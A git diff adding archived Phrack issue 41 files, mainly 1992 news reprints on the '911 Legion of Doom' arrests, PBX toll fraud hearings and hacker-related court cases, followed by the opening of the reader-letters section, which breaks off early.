+Authorities expect to make more arrests after penetrating a loose network of
+computer hackers called the "Legion of Doom" they say tapped into corporate
+phone lines to call 911 systems nationwide with the intent of disrupting
+emergency services.
+
+Prosecutors from Virginia, New Jersey and Maryland -- in conjunction with
+investigators from two telephone companies -- traced some of the hackers and
+closed in on three homes in two states.
+
+A 23-year-old Newark, New Jersey man was arrested early on October 9th.  He
+faces several charges, including fraud.  Other arrests are expected in two
+Maryland locations.
+
+The suspect, known by several aliases and identified by authorities only as
+Maverick, told investigators the group's intent was "to attempt to penetrate
+the 911 computer systems and infect them with viruses to cause havoc," said
+Captain James Bourque of the Chesterfield County police in Virginia.
+
+The probe is just beginning, according to Bourque.  "Quite honestly, I think
+it's only the tip of the iceberg," he said.
+
+The hackers first penetrate the phone lines of large companies or pay phones,
+then use those connections to call 911 lines, Bourque said.  The hackers
+usually make conference calls to other 911 services in other cities, tying up
+communications in several locations simultaneously.
+
+"One time we were linked up with Toronto and Los Angeles jurisdictions,"
+Bourque said.  "And none of us could disconnect."
+
+Sometimes as many five hackers would be on the line and would make false calls
+for help.  Communications officers, unable to stop the calls, would have to
+listen, then try to persuade the officers in other locales "that the call
+wasn't real," Bourque said.
+
+"Obviously, there's a real potential for disastrous consequences," he said.
+
+One phone bill charged to a company in Minnesota indicated the scope of the
+problem.  The company discovered in a 30-day period that it had been charged
+with more than $100,000 in phone calls generated by the hackers, according to
+Bourque.
+
+"I'm sure there are a multitude of other jurisdictions across the country
+having the same problems," Bourque said.
+
+People identifying themselves as members of the "Legion of Doom" -- which also
+is the name of a pro wresting team -- have called a Richmond, Virginia
+television station and ABC in New York in an attempt to get publicity, Bourque
+said.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ More On 911 "Legion Of Doom" Hacking Case                     October 20, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+NEW YORK CITY -- In a discussion with Newsbytes, Sgt. Kurt Leonard of the
+Chesterfield County, Virginia Police Department has disclosed further
+information concerning the on-going investigation of alleged 911 disruption
+throughout the eastern seaboard of the United States by individuals purporting
+to be members of the hacker group "The Legion of Doom" (LOD).
+
+Leonard identified the individual arrested in Newark, New Jersey, previously
+referred to only as "Maverick," as Scott Maverick, 23.  Maverick has been
+charged with terroristic threats, obstruction of a government function, and
+illegal access to a computer.  He is presently out on bail.
+
+Leonard said that David Pluchino, 22, was charged to the same counts as
+Maverick and an additional count of the possession of burglary tools.  Leonard
+said that Pluchino, the subject of a 1990 Secret Service "search and seizure"
+action under the still on-going "Operation SunDevil" investigation," possessed
+information linking him with members of the Legion of Doom.
+
+The Legion of Doom connection has become the subject of controversy within the
+online community.  Although Maverick has been quoted as saying that he is a
+member of the group and that the group's intent was "to attempt to penetrate
+the 911 computer systems and inflect them with viruses to cause havoc," members
+of the group have disavowed any connection with those arrested.
+
+"Lex Luthor," one of the original members of the group, told Newsbytes when the
+initial report of the arrests became public: "As far as I am concerned the LOD
+has been dead for a couple of years, never to be revived.  Maverick was never
+in LOD.  There have been 2 lists of members (one in Phrack and another in the
+LOD tj) and those lists are the final word on membership."
+
+He added, "We obviously cannot prevent copy-cats from saying they are in LOD.
+When there was an LOD, our goals were to explore and leave systems as we found
+them.  The goals were to expose security flaws so they could be fixed before
+REAL criminals and vandals such as this Maverick character could do damage.  If
+this Maverick character did indeed disrupt E911 service he should be not only
+be charged with computer trespassing but also attempted murder.  911 is serious
+business."
+
+Lex Luthor's comments, made before the names of the arrested were released,
+were echoed by Chris Goggans, aka "Erik Bloodaxe," and Mark Abene, aka "Phiber
+Optik," both ex-LOD members, and by Craig Neidorf who chronicled the membership
+of LOD in his electronic publication "Phrack."
+
+When the names of the arrested became public, Newsbytes again contacted Lex
+Luthor to see if the names were familiar.  Luthor replied: "Can't add anything,
+I never heard of them."
+
+Phiber Optik, a New York resident, told Newsbytes that he remembered Pluchino
+as a person that ran a computer "chat" system called "Interchat" based in New
+Jersey.  "They never were LOD members and Pluchino was not known as a computer
+hacker.  It sounds as though they were LOD wanabees who are now, by going to
+jail, going to get the attention they desire," he said.
+
+A law enforcement official, familiar with the SunDevil investigation of
+Pluchino, agreed with Phiber, saying, "There was no indication of any
+connection with the Legion of Doom."  The official, speaking under the
+condition of anonymity, also told Newsbytes that the SunDevil investigation of
+Pluchino is still proceeding and, as such, no comment can be made.
+
+Leonard also told Newsbytes that the investigation has been a joint effort of
+New Jersey, Maryland, and Virginia police departments and said that, in
+conjunction with the October 9th 2:00 AM arrests of Pluchino and Maverick, a
+simultaneous "search and seizure" operation was carried out at the Hanover,
+Maryland home of Zohar Shif, aka "Zeke," a 23 year-old who had also been the
+subject of a SunDevil search and seizure.
+
+Leonard also said that, in addition to computers taken from Pluchino, material
+was found "establishing a link to the Legion of Doom."  Told of the comments by
+LOD members that the group did not exist anymore, Leonard said "While the
+original members may have gone on to other things, these people say they are
+the LOD and some of them have direct connection to LOD members and have LOD
+materials."
+
+Asked by Newsbytes to comment on Leonard's comments, Phiber Optik said "The
+material he's referring to is probably text files that have been floating
+around BBS's for years, Just because someone has downloaded the files certainly
+doesn't mean that they are or ever were connected with LOD."
+_______________________________________________________________________________
+
+ Complaints On Toll Fraud Aired at FCC En Banc Hearing         October 13, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Art Brodsky (Communications Daily)(Page 1)
+
+Customers of PBX manufacturers told the Federal Communications Commission (FCC)
+they shouldn't be liable for toll fraud losses incurred because vendors never
+told them of capabilities of their equipment that left companies open to
+electronic theft.  Their case was buttressed by one of country's leading toll-
+fraud investigators, who told day-long en banc hearing that customers shouldn't
+have to pay if they're victimized.  Donald Delaney of the New York State Police
+said toll fraud "is the only crime I know where the victims are held liable."
+Toll fraud losses have been estimated to run into billions of dollars.
+
+Commission's look at toll fraud came in context of what FCC can do to prevent
+or lessen problem.  Comr. Marshall said Commission's job would be to apportion
+liability between vendors and customers.  Comr. Duggan, who has been leader on
+issue at Commission, said toll fraud was "hidden degenerative disease on the
+body of business."  He focused on insurance solution to problem, along with
+sharing of liability.  There are cases pending at FCC filed by AT&T customers
+that deal with sharing of liability, and whether common carriers are protected
+by tariffs from paying customers for losses.  Witnesses told Commission it was
+hard to find any law enforcement agency interested in problem, from local
+police to FBI, in addition to difficulties with vendors.  U.S. Secret Service
+has statutory responsibility over toll fraud, said attorney William Cook, who
+testified in afternoon session.  There was general agreement that more customer
+education was needed to prevent fraud, policy endorsed by Northern Telecom,
+which has active customer education program.
+
+AT&T came in for particular criticism in morning session as users said company
+was insensitive to toll fraud problems.  Thomas Mara, executive vice-president
+Leucadia National Corp., whose company suffered $300,000 in toll fraud, said he
+"had a hell of a time getting anybody at AT&T to pay attention" to problems his
+company was encountering.  Mara said his company saw level of 800 calls rise to
+10,448 from 100.  He said AT&T was supposed to notify users if there was any
+"dramatic increase in volume, yet we were not notified of a thousandfold
+increase in 800 number usage nor were we informed of an increase from a few
+hours a month in international calls to thousands of hours by AT&T, only after
+receiving our bills."  Investigation found that 800 number connecting Rolm
+switch to company's voice mail was hackers' entry method, Mara said.
+
+Clearly angry with AT&T, Mara said he has "a feeling they use it as a profit
+center."  Lawrence Gessini, telecommunications director for Agway Corp. of
+Syracuse, agreed, saying: "Toll fraud should not become a rationale for higher
+profits for carriers."  He told FCC that new programs introduced by long
+distance carriers won't solve problem because of constraints, limitations and
+expense.
+
+Speaking for International Communications Association (ICA) user group, Gessini
+said problems occur because new technologies allow more types of fraud and
+because "old tariff concepts" that limit common carrier liability "distort
+market incentives."  Vendors, he said, are "generally lackadaisical and are
+slow to correct even known problems in their hardware, firmware and software,"
+and give low priority to complaints.  ICA advocated 5 principles including FCC
+inquiry into fraud, creation of advisory committee and willingness of
+Commission to protect users.
+
+Geoffrey Williams, industry consultant and telecommunications manager for
+IOMEGA Corp., said AT&T has been "most notable" for asking for restitution,
+while Sprint and MCI are more lenient.  MCI doesn't charge users for first
+hacking incident, he said, but after that users are on their own.
+
+AT&T defended itself in afternoon session, when International Collections Dist.
+Manager Peter Coulter rejected users' accusations, saying company had increased
+customer education program "dramatically" since last year.  He insisted that
+AT&T is "very concerned" by toll fraud: "Contrary to what some people want to
+believe, no long distance carrier is making a profit off toll fraud."  He said
+AT&T had 6,000 customers attend equipment security seminars in 1991, but that
+number had been exceeded in first 6 months of 1992.  He said results of
+increased education program were "only preliminary" but his group was receiving
+"a lot more accommodations" than complaints from customers.
+
+Coulter, while never admitting that company should shoulder any financial
+liability, admitted that "things are different now" as to how AT&T approaches
+toll fraud problem.  He said that within AT&T it used to be hardware division
+vs. service division.  "The hardware guys said it was a service problem, the
+service guys said it was the hardware's fault," Coulter said.  But now both
+divisions are "working together on the problem . . . we're talking to each
+other."
+
+Delaney of N.Y. state police gave the FCC a picture of the toll fraud situation
+dominated by as few as 15 practitioners, most of whom gain illegal entry to
+telephone systems simply by dialing numbers for hours on end.  Those so-called
+"finger hackers," rather than computer hackers, are responsible for 90% of
+fraud, he said, telling Commission that equipment vendors should be held
+accountable for fraud.  Most fraudulent calls go to Pakistan, Colombia and
+Dominican Republic, he said.
+
+Delaney pointed out practical objection to further vendor education problem,
+telling commissioners that for vendor to engage in education would also be to
+admit there could be problem with equipment security, something sales people
+don't want to do.  He said some customers had been sold systems and didn't know
+they had capability for remote access -- means used by hackers to gain entry.
+_______________________________________________________________________________
+
+ Hanging Up On Hackers                                         October 12, 1992
+ ~~~~~~~~~~~~~~~~~~~~~
+ by Miriam Leuchter (Crain's New York Business)(Page 21)
+
+            "Thieves tap phone systems, but business cuts the line."
+
+Ron Hanley suspected a technical glitch when his company's telephone bill
+listed an unusually large number of calls lasting four seconds to its 800-
+number from New York City.  But the executive at Dataproducts New England in
+Wallingford, Connecticut didn't lose sleep over the problem -- until he got a
+call two months later from the security department at American Telephone &
+Telegraph Co.
+
+Dataproducts had been hacked.  Two days after that, Mr. Hanley got a bill
+confirming the bad news:  In one 24-hour period, street-corner phone users in
+New York had made some 2,000 calls to the Caribbean on the company's line,
+ringing up about $50,000 in tolls.
+
+Dataproducts is not alone.  Estimates of the cost of telecommunications fraud
+in the United States each year run from $1 billion to as much as $9 billion.
+According to John J. Haugh, editor of Toll Fraud and Telabuse and chairman of a
+Portland, Oregon consulting firm, losses reached $4 billion in 1991 and are
+expected to climb 30% in 1992.
+
+Some 35,000 businesses and other users -- such as foundations and government
+agencies -- will be hit this year.  In the first six months, Mr. Haugh says,
+more than 900 New York City companies were victims of telephone-related fraud.
+
+"If you have a PBX system or calling cards or voice mail, you are vulnerable,
+exceedingly vulnerable," says Peggy Snyder, executive director of the
+Communications Fraud Control Association, a national information clearinghouse
+based in Washington.  "As technology gets more user-friendly, the opportunity
+to commit a crime is much greater."
+
+Armed with computers, modems and sometimes automatic dialers or random-number
+generating software, high-technology thieves can use your telephone system as
+if it is their own -- without having to pay the tolls.  The series of very
+short calls Mr. Hanley spotted on one phone bill should have tipped off his
+800-number service provider -- which he had alerted when he spotted the pattern
+-- that hackers were trying to break into his system.
+
+Who are these hackers -- a term used to describe someone who uses a telephone
+or computer to obtain unauthorized access to other computers?  Many are
+teenagers or young adults out to demonstrate their computer skills and make
+some mischief.  Five young New Yorkers are awaiting trial in federal court on
+unauthorized access and interception of electronic communications charges in
+one widely publicized telephone fraud case.
+
+A much smaller proportion are more serious criminals: drug dealers, money
+launderers and the like, who don't want their calls traced.  In one case, Ms.
+Snyder cites a prostitution ring that employed unused voice mail extensions at
+one company to leave and receive messages from clients.
+
+Many hackers have connections to call-sell operators who set up shop at phone
+booths, primarily in poorer immigrant neighborhoods in cities from New York to
+Los Angeles.  For a flat fee -- the going rate is $10, according to one source
+-- callers can phone anywhere in the world and talk as long as they want.  The
+hawker at the phone booth pockets the cash and someone else pays the bill.
+
+Perhaps 15 to 20 so-called finger hackers (who crack authorization codes by
+hand dialing) distribute information to call-sell operators at thousands of
+locations in New York.  According to Don Delaney, a senior investigator for the
+New York State Police, the bulk of such calls from phone booths in the city go
+to the Dominican Republic, Pakistan and Colombia.
+
+Hackers may use more than technical skill to gain the access they want.
+Sometimes they practice "social engineering" -- talking a company's employees
+into divulging information about the telephone system.  Or they manage a
+credible imitation of an employee, pretending to be an employee.
+
+In one of the latest schemes, a fraudulent caller gets into a company's system
+and asks the switchboard operator to connect him with an outside operator.  The
+switchboard assumes the caller is an employee who wants to make a personal call
+on his own calling card.
+
+Instead, he uses a stolen or hacked calling card number.  The fraud goes
+undetected until the card's owner reports the unauthorized use to his long-
+distance carrier.  If the cardholder refuses to pay the charges, the phone
+company traces the calls to the business from which they were placed.  Because
+it looks as if the call came from the company, it is often held liable for the
+charge.
+
+In another new twist, a hacker gains access to an unused voice mail extension
+at a company, or takes over someone's line at night or while the regular user
+is on vacation.  He changes the recorded announcement to say, "Operator, this
+number will accept all collect and third-party calls."  Then the hacker -- or
+anyone else -- can telephone anywhere in the world and bill the charges to that
+extension.
+
+Sometimes the fraud is much more organized and sophisticated, however.  Robert
+Rasor, special agent in charge of the financial crime division of the U.S.
+Secret Service, gives an example of a three-way calling scheme in which hackers
+tap into a phone system in the United States and set up a separate network that
+allows people in other countries to call each other directly.  "The
+Palestinians are one of the more prominent groups" running these sorts of
+fraud, he says.
+
+But no matter who the end user is, businesses like Dataproducts end up footing
+the bill.  Personal users are generally not held liable for the unauthorized
+use of their calling card numbers.  Under current regulation, a business is
+responsible for all calls that go through its equipment, whether or not those
+calls originated at the company.
+
+This hard fact rankles Mr. Hanley.  "It's totally frustrating and almost
+unbelievable that you're responsible for this bill.  It's really frightening
+for any company."
+
+Dataproducts's liability was relatively small compared with the $168,000
+average Mr. Haugh calculated in a study he made last year.  It could have been
+worse yet.
+
+"The largest case I've ever seen in the metropolitan region was a company that
+lost almost $1 million within 30 days," says Alan Brill, managing director of
+the New York corporate security firm Kroll Associates Inc.
+
+"It was a double whammy, because even though their long-distance carrier saw a
+suspicious pattern of calls and blocked access to those area codes, the company
+didn't know its PBX system would automatically switch to another carrier if
+calls couldn't go through," Mr. Brill says.  "So the company got a bill for
+$300,000 from its primary carrier and a $600,000 bill from the secondary
+carrier."
+
+Both AT&T and Sprint Corp. offer service plans that limit liability to $25,000
+per fraud episode for their business customers.  Mr. Brill advises companies to
+evaluate the cost-effectiveness of these plans in great detail, because in
+order to be eligible for coverage companies must take certain steps to minimize
+their risk.  "If you reduce your risk significantly, you may not need the
+coverage," he says.
+
+The plans require customers to respond to a problem in as little as two hours
+after notification of unauthorized calls.  Doing so will stem your losses in
+any event.  "You also have to think about how you're staffed," adds Mr. Brill.
+"Can you act that fast?"
+_______________________________________________________________________________
+
+ PWN Quicknotes
+ ~~~~~~~~~~~~~~
+
+1.  HACKER PARTY BUSTED (by Robert Burg, Gannett, 11/3/92) -- "PumpCon Popped!"
+    -- WHITE PLAINS, New York -- Police say a Halloween party they broke up
+    Sunday (11/1/92) was more than just a rowdy party - it also was a computer
+    hacker party.
+
+    Three men were charged with unauthorized use of a computer and attempting
+    computer trespass.  A fourth man was arrested on an outstanding warrant
+    involving violating probation on a charge of computer fraud in Arizona,
+    Greenburgh Detective Lt. Cornelius Sullivan said.
+
+    Security officers at the Westchester Marriott contacted police after
+    noticing an unusual number of people entering and leaving one room.  Police
+    said that when they arrived, there were 21 people inside and computers
+    hooked up to telephone lines.  Police said they also found telephone credit
+    cards that did not belong to any of the people present.
+
+    The three charged with unauthorized use of a computer and attempted
+    computer trespass were Randy Sigman, 40, of Newington, Connecticut; Ronald
+    G. Pinz, 21, of Wallingford, Connecticut and Byron Woodard, 18, of
+    Woonsocket, Rhode Island.
+
+    They were being held at the Westchester County Jail in Valhalla pending
+    arraignment.
+
+    The man charged on the warrant, Jason Brittain, 22, of Tucson, Arizona, was
+    being held without bail pending arraignment.
+
+    The Westchester County District Attorney frauds division seized the
+    computer hardware, software, and other electrical equipment.
+
+    Sullivan said the party-goers heard about the party through computer
+    bulletin boards.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+2.  COMPUTER ACCESS ARRESTS IN NEW YORK (Barbara E. McMullen & John F.
+    McMullen, Newsbytes, 11/3/92) -- GREENBURGH, NEW YORK -- The Greenburgh,
+    New York Police Department has announced the arrest of three individuals,
+    Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron J. Woodard, 18 for
+    the alleged crimes of Unauthorized Use Of A Computer and Attempted Computer
+    Trespass, both misdemeanors.  Also arrested was Jason A. Brittain, 22 in
+    satisfaction of a State of Arizona Fugitive From Justice warrant.
+
+    The arrests took place in the midst of an "OctoberCon" or "PumpCon" party
+    billed as a "hacker get-together" at the Marriott Courtyard Hotel in
+    Greenburgh.  The arrests were made at approximately 4:00 AM on Sunday
+    morning, November 1st.  The three defendants arrested for computer crimes
+    were granted $1,000 bail and will be arraigned on Friday, November 6th.
+
+    Newsbytes sources said that the get together, which had attracted up to
+    sixty people, had dwindled to approximately twenty-five when, at 10:00
+    Saturday night, the police, in response to noise complaints arrived and
+    allegedly found computers in use accessing systems over telephone lines.
+    The police held the twenty-five for questioning and called in Westchester
+    County Assistant District Attorney Kenneth Citarella, a prosecutor versed
+    in computer crime, for assistance. During the questioning period, the
+    information on Brittain as a fugitive from Arizona was obtained and at 4:00
+    the three alleged criminal trespassers and Brittain were charged.
+
+    Both Lt. DeCarlo of the Greenburgh police and Citarella told Newsbytes
+    that the investigation is continuing and that no further information is
+    available at this time.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+3.  U.S. PRISON SENTENCE FOR COMPUTER HACKER (New York Law Journal, 10/15/92,
+    Page 7) -- A Brooklyn man was sentenced yesterday to eight months in prison
+    for buying passwords from a computer hacker group known as the "masters of
+    deception" [MOD] for resale to others seeking access to confidential credit
+    reports.
+
+    Morton Rosenfeld, 21, received the sentence in federal court in Manhattan
+    after pleading guilty in June to obtaining the unauthorized access devices
+    to computer data bases operated by TRW Information Services and other
+    credit reporting companies.
+
+    The sentence, imposed by Southern District Judge Shirley Wohl Kram, is
+    believed to be among few prison terms levied for computer-related offenses.
+
+    Meanwhile, charges are pending against Mr. Rosenfeld's alleged source: the
+    five members of the masters of deception, young men in their teens and
+    20's.  The five were accused in July of breaking into computer systems run
+    by credit reporting services, telephone companies and educational
+    institutions.
+
+    For more information about the indictment and case against MOD, see ALL the
+    articles in PWN 40-2.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+4.  2ND ONLINE LEGAL GUIDE RELEASED (by Barbara E. McMullen & John F. McMullen,
+    Newsbytes, 10/13/92) -- NEW YORK CITY -- PC Information Group has announced
+    the release of SysLaw, Second Edition: The Legal Guide for Online Service
+    Providers by attorneys Lance Rose and Jonathan Wallace.
+
+    According to the company, "Syslaw provides BBS sysops, network moderators
+    and other online service providers with basic information on their rights
+    and responsibilities, in a form that non-lawyers can easily understand."
+
+    Subjects covered by the book include the First Amendment, copyrights and
+    trademarks, the user agreement, negligence, privacy, criminal law, searches
+    and seizures, viruses and adult materials.  The company claims that SysLaw
+    not only explains the laws, but that it gives detailed advice enabling
+    system operators to create the desired balance of user services, freedom,
+    and protection from risk on their systems."
+
+    Co-author Lance Rose told Newsbytes: "In the four years since the
+    publication of the first edition, the electronic community has become
+    alerted to the first amendment dimensions of the on-line community."
+
+    "The first amendment has profound implications to the on-line community
+    both to liberate providers and users of on-line systems and to protect them
+    from undue legal harassment.  There has, in the last few years, been a lot
+    of law enforcement activity effecting bulletin board systems, including the
+    Steve Jackson and Craig Neidorf/Phrack cases," he said.
+
+    Rose continued, "The new edition incorporates these new developments as
+    well as containing new information concerning on-line property rights, user
+    agreements, sysop liabilities, viruses and adult material contained on
+    online systems."
+
+    SysLaw is available from PC Information Group, 1126 East Broadway, Winona,
+    MN  55987 (800-321-8285 or 507-452-2824) at a price of $34.95 plus $3.00
+    shipping and (if applicable) sales tax.
+
+    Press Contact:  Brian Blackledge, PC Information Group, 800-321-8285
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+5.  YET ANOTHER BOOK ABOUT THE COMPUTER UNDERGROUND (The Daily Telegraph,
+    12/14/92, Page 25) -- Approaching Zero: Data Crime and the Computer
+    Underworld by Bryan Clough and Paul Mungo (Faber & Faber, L14.99) -- A look
+    at the world of Fry Guy, Control C, Captain Zap and other hackers to blame
+    for the viruses, logic bombs and Trojan horses in the world's personal
+    computer networks.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+6.  HONOR STUDENT NABBED IN COMPUTER FRAUD (The Washington Times, 11/9/92, Page
+    A6) -- BROOKSVILLE, FLA.-- Three high school honor students have been
+    accused of stealing tens of thousands of dollars worth of long-distance
+    calls as computer hackers.
+
+    Brian McGrogan, 16, and Edmund Padgett, 17, who were charged as adults, and
+    a 15-year-old allegedly tapped private telephone systems and dialed into an
+    international hacking network.  One company's loss was $36,000.
+
+    "These are very sharp, intelligent kids," Hernando County sheriff's Captain
+    Richard Nugent said after the arrests.  "It's a game to them.  It's a
+    sport."
+
+    Some calls were made to computer bulletin boards in the United Kingdom,
+    Germany and Canada, where a loose network of hackers allegedly shared
+    information about how to obtain computer data and access information.
+    Arrests in the case also were made in New York and Virginia, Captain Nugent
+    said.
+
+    The two older boys were booked on charges of organized fraud and violation
+    of intellectual property.  The third boy was released to his parents.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+7.  A CORDLESS PHONE THAT CAN THWART EAVESDROPPERS (Business Week, 8/3/92) --
+    To industrial spies and other snoops, the millions of cordless phones in
+    use are goldmines of information.  Conversations can be plucked out of the
+    air by means of a police type scanner, and with increasing ease.  The
+    latest no-cord technologies offers clearer sound and longer ranges -- up to
+    half a mile.  That's because the new phones broadcast signals at 900 MHz,
+    or 20 times the frequency of current models.
+
+    Cincinnati Microwave, Inc. (the radar detector people) figures executives
+    and consumers will pay a small premium for cordless privacy.  The company
+    has developed a phone, to be marketed in October by its Escort division for
+    about $300, that thwarts eavesdroppers with "spread spectrum" technology,
+    which is similar to the encryption method that the military uses in secure
+    radios.  The signals between the handset and base unit are digitized,
+    making them unintelligible to humans, and the transmission randomly hops
+    among various frequencies within the 900 MHz spectrum.  To keep the cost
+    down to the range of other 900 MHz models, Cincinnati Microwave has
+    developed special microchips that keep the handset and base in sync.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+8.  NEW AREA CODE -- As of November 1, 1992, a new 210 area code is serving 152
+    communities in the San Antonio and Rio Grande Valley areas.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+9.  FOR SALE: PHONE-PHREAKING TOOLS (Brigid McMenamin, Forbes, 8/3/92, Page 64)
+    -- From his remote outpost in Alamogordo, New Mexico, John Williams makes a
+    nice living telling hackers how to rip off phone and computer systems.
+
+    Williams says he brings in about $200,000 a year publishing books on
+    everything from credit card scams and cracking automated teller machines to
+    electronic shoplifting, cellular phone phreaking and voice mailbox hacking,
+    each costing $29 to $39, and each complete with precise instructions.  He
+    even sells Robofones, which save hackers from doing a lot of dialing while
+    they steal access codes.
+
+    Isn't what he does illegal?  Perhaps it should be, but it isn't.  Wrapping
+    himself in the First Amendment, Williams is a member in good standing of
+    the Alamogordo Chamber of Commerce and the New Mexico Better Business
+    Bureau.  He thumbs his nose at companies and authorities that would like to
+    make him stop selling such secrets.  "We don't promote fraud," he insists.
+    "It's all sold for educational purposes only.  If we didn't publish the
+    information, it would still be out there."
+
+    But last year Williams got a visit form the Secret Service, which was
+    following up on a telephone fraud case in which one of his publications
+    figured prominently.
+
+    In Gainsville, Florida, in November 1990, two young men were locked up by
+    police for hacking into voice-mail systems and then making calls to 900
+    numbers.  One of the pair, known as the Shark, then 20, confessed to the
+    crime, but said he was on assignment for Williams' Consumertronics
+    publication.  The culprits could have been given five years on the fraud
+    charge alone.  But the victim didn't want any publicity, so the state let
+    them do 50 hours of community service instead.
+
+    The Secret Service went to talk to Williams.  Williams assured agent James
+    Pollard that he'd never told the Shark to do anything illegal.
+    Nevertheless, says Williams, the agent implied that Williams and members of
+    his family who work for him might be prosecuted for publishing voice-mail
+    access codes.
+
+    In the end, no charges were filed against Williams, who admits he has a
+    thing against big business, especially the phone companies.  "For decades,
+    they financed right-wing regimes in Latin America," he rants.
+
+    It's a crazy world, that of the telephone toll fraudsters.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+10. NEW YORK STATE POLICE DECRIMINALIZE THE WORD "HACKER" (Barbara E. McMullen
+    & John F. McMullen, Newsbytes, 10/21/92) -- ALBANY, NEW YORK -- Senior
+    investigator Ron Stevens of the New York State Police Computer Unit has
+    told Newsbytes that it will be the practice of his unit to avoid the use of
+    the term "hacker" in describing those alleged to have committed computer
+    crimes.
+
+    Stevens told Newsbytes, "We use the term computer criminal to describe
+    those who break the law using computers.  While the lay person may have
+    come to understand the meaning of hacker as a computer criminal, the term
+    isn't accurate.  The people in the early days of the computer industry
+    considered themselves hackers and they made the computer what it is today.
+    There are those today who consider themselves hackers and do not commit
+    illegal acts."
+
+    Stevens had made similar comments in a recent conversation with Albany BBS
+    operator Marty Winter.  Winter told Newsbytes, "'Hacker' is, unfortunately
+    an example of the media taking what used to be an honorable term, and using
+    it to describe an activity because they (the media) are too lazy or stupid
+    to come up with something else.  Who knows, maybe one day 'computer
+    delinquent' WILL be used, but I sure ain't gonna hold my breath."
+
+    Stevens, together with investigator Dick Lynch and senior investigator
+    Donald Delaney, attended the March 1992 Computers, Freedom and Privacy
+    Conference (CFP-2) in Washington, DC and met such industry figures as Glenn
+    Tenney, congressional candidate and chairman of the WELL's annual "Hacker
+    Conference"; Craig Neidorf, founding editor and publisher of Phrack; Steven
+    Levy, author of "Hackers" and the recently published "Artificial Life";
+    Bruce Sterling, author of the recently published "The Hacker Crackdown";
+    Emmanuel Goldstein, editor and publisher of 2600: The Hacker Quarterly" and
+    a number of well-known "hackers."
+
+    Stevens said, "When I came home, I read as much of the literature about the
+    subject that I could and came to the conclusion that a hacker is not
+    necessarily a computer criminal."
+
+    The use of the term "hacker" to describe those alleged to have committed
+    computer crimes has long been an irritant to many in the online community.
+    When the July 8th federal indictment of 5 New York City individuals
+    contained the definition of computer hacker as "someone who uses a computer
+    or a telephone to obtain unauthorized access to other computers," there was
+    an outcry on such electronic conferencing system as the WELL (Whole Earth
+    'Lectronic Link).  Many of the same people reacted quite favorably to the
+    Stevens statement when it was posted on the WELL.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+11.  STEVE JACKSON GAMES TRIAL DATE SET -- Mike Godwin, General Counsel for the
+     Electronic Frontier Foundation, announced on December 23rd that the case
+     of Steve Jackson Games, et.al. v. The United States Secret Service et. al.
+     will go to trial in Austin, Texas on Tuesday, January 19, 1993.
+_______________________________________________________________________________
diff --git a/phrack41/2.txt b/phrack41/2.txt
new file mode 100644
index 0000000..ad5686e
--- /dev/null
+++ b/phrack41/2.txt
@@ -0,0 +1,1120 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 2 of 13
+
+                          [-=:< Phrack Loopback >:=-]
+
+                            By Dispater & Mind Mage
+
+     Phrack Loopback is a forum for you, the reader, to ask questions, air
+problems, and talk about what ever topic you would like to discuss.  This is
+also the place Phrack Staff will make suggestions to you by reviewing various
+items of note; books, magazines, software, catalogs, hardware, etc.
+
+In this issue:
+
+     Comments on Phrack 40                        : Rop Gonggrijp
+     Fine Art of Telephony (re: Phrack 40)        : Inhuman
+     Question & Comment (BT Tymnet/AS400)         : Otto Synch
+     BT Tymnet article in Phrack 40               : Anonymous
+     Phrack fraud?                                : Doctor Pizz
+     Remarks & Warning!                           : Synaps/Clone1/Feyd
+     One Ron Hults (re: Phrack 38 Loopback)       : Ken Martin
+     Hacking In Czecho-Slovakia                   : Stalker
+     Phrack 40 is Sexist!                         : Ground Zero
+     Phrack 40 is Sexist!? (PC Phrack)            : Shit Kickin' Jim
+     Misunderstood Hackers Get No Respect         : The Cruiser
+     Hackers Should Land In Jail, Not In Press    : Alan Falk
+     Anonymous Usenet Posting?                    : Anonymous
+     Anonymous Mail Poster                        : Sir Hackalot
+     Phrack On The Move                           : Andy Panda-Bear
+     Computer Underground Publications Index      : Amadeus
+     Pirates v. AT&T: Posters                     : Legacy Irreverent
+     Ultrix 4.2 Bug                               : Krynn
+     PumpCon Hosed                                : Phil "The Outlander"
+     2600 Meeting Disrupted by Law Enforcement    : Emmanuel Goldstein
+     Two New Hardcovers                           : Alan J. Rothman
+_______________________________________________________________________________
+
+ Letters to the Editors
+ ~~~~~~~~~~~~~~~~~~~~~~
+From: rop@hacktic.nl (Rop Gonggrijp) (Editor of Hack-Tic Magazine)
+Date: August 14, 1992
+Subject: Comments on Phrack 40
+
+My compliments!  You've put out one of the best issues to date.  If you keep
+this up I'll have to get jealous!
+
+     Rop Gonggrijp (rop@hacktic.nl)        Dangerous and capable of making
+     fax: +31 20 6900968                        considerable trouble.
+
+----------
+
+From: Inhuman (Sysop of Pentavia BBS)
+Date: August 18, 1992
+Subject: Fine Art of Telephony
+
+I just wanted to let you guys know that the article titled "The Fine Art of
+Telephony" was one of the best articles I've seen in Phrack in a long time.
+
+I hope to see more information on switching and general telephony in the
+future.
+
+Thanks,
+
+Inhuman
+
+----------
+
+Date: October 22, 1992
+From: Otto Synch
+Subject: Question & Comment
+
+Hello,
+
+Reading your (huge) Phrack issue #40, and noticing that you were accepting
